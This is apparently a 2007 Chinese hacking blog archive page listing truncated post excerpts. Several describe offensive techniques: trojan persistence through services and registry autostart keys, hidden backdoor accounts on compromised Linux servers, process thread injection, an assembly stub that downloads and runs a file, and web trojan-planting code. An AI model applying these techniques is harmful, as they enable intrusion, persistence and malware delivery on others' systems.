2007年09月_yxyhack

12月 11月 10月 09月 08月 07月 06月

转载端口复用技术与实现代码

在WINDOWS的SOCKET服务器应用的编程中，如下的语句或许比比都是：　　s=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP); 　　saddr.sin_family = AF_INET; 　　saddr.sin_addr.s_addr = htonl(INADDR_ANY); 　　bind(s,(SOCKADDR *)&saddr,sizeo

2007-09-29 15:27:00 1531

转载在Windows2000/XP下向进程插入自己的线程的演示

在Windows2000/XP下向进程插入自己的线程的演示编写 ImageWalk.Dll (作用是当被加载，它就通过VirtualQuery获取加载它的进程所加载的Dll信息)使用VC6生成一个 Win32 Dynamic-Link Library 工程编写DllMain函数内容如下： BOOL APIENTRY DllMain( HANDLE hModule, DWORD ul_reas

2007-09-29 15:22:00 1169

转载如何把木马注册为系统服务

前几天下了个鸽子来研究下注册成系统服务的方法（我不用鸽子），发现它是用rundll32导入一个inf来实现的，这个应该是加了注册表锁（禁用reg脚本，禁用regedit）都有效的吧？例子如下：增加一个服务： [Version] Signature="$WINDOWS NT$" [DefaultInstall.Services] AddService=inetsvr,,My_AddSer

2007-09-29 11:34:00 2433

原创 Linux系统后门技术（隐藏帐户篇）注：已发表在《黑客手册》第6期

Linux系统后门技术（隐藏帐户篇）每当我们欢天喜地的得到一个linux系统的服务器肉鸡时，最大的愿望就是能把它永远留住。当然，永远留住是不可能的，但是我们要尽量的不让它飞走。这就要用到linux的后门技术了，这是项复杂的技术，本人水平有限不可能面面俱到，我只希望这一系列文章能为大家提供一点思路，在您hacking的道路上打开一扇方便之门！言归

2007-09-25 12:47:00 12742 4

转载通过修改程序的代码使程序能够下载并运行指定程序

相关代码如下：原入口： jmp xxxxxxxx 代码段②开始的位置 ①： pushad push xxxxxxxx 字符串urlmon.dll的位置 call kernel32.LoadLibraryA push xxxxxxxx 字符串URLDownloadToFileA的位置 push eax call kernel32.GetProcAddress

2007-09-25 11:29:00 1320 1

转载目前比较常用的挂马代码

一:框架挂马二:js文件挂马首先将以下代码 document.write(""); 保存为xxx.js，则JS挂马代码为三:js变形加密 muma.txt可改成任意后缀四:body挂马五:隐蔽挂马 top.document.body.innerHTML = top.document.body.innerHT

2007-09-25 10:40:00 3489

一. 诡异的中毒现象在成品检验科文员办公室的一台电脑上折腾半个小时后，计算机维护部门的技术员只觉得眼皮不停狂跳，因为从刚开始接手这个任务开始，他就一直在做无用功：他随身带的U盘里引以为豪的众多维护工具包在这台机器上全军覆没，无论他直接在U盘上运行还是随便复制到哪个目录里，系统都是报告“找不到文件”或者直接没有运行起来的反应，他第一次感受到了恐惧，文件分明就好好的在眼皮底下，可它们就是“找不到”或死

2007-09-21 15:18:00 4865

转载编程8字箴言

1"忽如一夜春风来,千树万树梨花开."现在的技术百花齐放,切忌不可贪. 不要盲目的追求新技术,唯有算法才是灵魂. 2"非淡泊无以明志,非宁静无以致远."要想达到高的境界，必须能够心静. 年轻的程序员都很浮躁,这一点对于他们来说尤为的重要. 3谦不仅指技术,而且还指人.一门实用的技术,无论多么容易掌握.只要你深入的研究,都会挖掘出很多新东西来.对于人来讲,你可能会就某些

2007-09-18 18:24:00 940

转载给应用程序创建快捷方式VC实现

1　引言在Windows 3.x中，软件安装程序通常使用动态数据交换(DDE)的方法在程序管理器(Program Manager)中创建一个程序组(Program Group)。随着Windows95/98/NT这些32操作系统在系统内核和用户界面上的巨大改进，这种方法在已经不再适用了。现在，几乎所有的安装程序都是在“开始”菜单中添加新的菜单项，或者在桌面上建立新的快捷方式(Shortcut

2007-09-11 16:51:00 4930

原创一个非常酷的网站（应该是FLASH的）

无意中看到的一个站，页面作的非常酷，真是太喜欢了，而且里面有很多有用的内容哦。大家都来欣赏一下吧，绝对是不一样的感受，主题是和Visual Studio 2005有关。网站链接：http://www.challenges.com.cn/

2007-09-07 17:46:00 1040 1

转载木马启动又出三招

-------1-----------------Hkey_current_user/software/microsoft/windows nt/currentversion /windows 建一个字符串名为load键值为自启动程序的路径但是要注意短文件名规则，如c:/program files 应为c:/progra~1这种方式用优化大师看不到-------2-----------------

2007-09-07 10:58:00 1380

转载 8088 汇编跳转

一、状态寄存器PSW（Program Flag)程序状态字寄存器，是一个16位寄存器，由条件码标志（flag）和控制标志构成，如下所示： 15 14

2007-09-06 10:27:00 839

转载 8088 汇编指令速查手册

一、数据传输指令 ─────────────────────────────────────── 它们在存贮器和寄存器、寄存器和输入输出端口之间传送数据. 1. 通用数据传送指令. MOV 传送字或字节. MOVSX 先符号扩展,再传送. MOVZX 先零扩展,再传送. PUSH

2007-09-06 10:24:00 1050

转载仿真WINDOWS PE加载器的程序

此程序用来仿真PE加载器，可以直接运行内存中的程序。 bool PELoader(char *lpStaticPEBuff, long lStaticPELen) { long lPESignOffset = *(long *)(lpStaticPEBuff + 0x3c); IMAGE_NT_HEADERS *pINH = (IMAGE_NT_HEADERS *)(lpStaticPE

2007-09-04 17:45:00 4853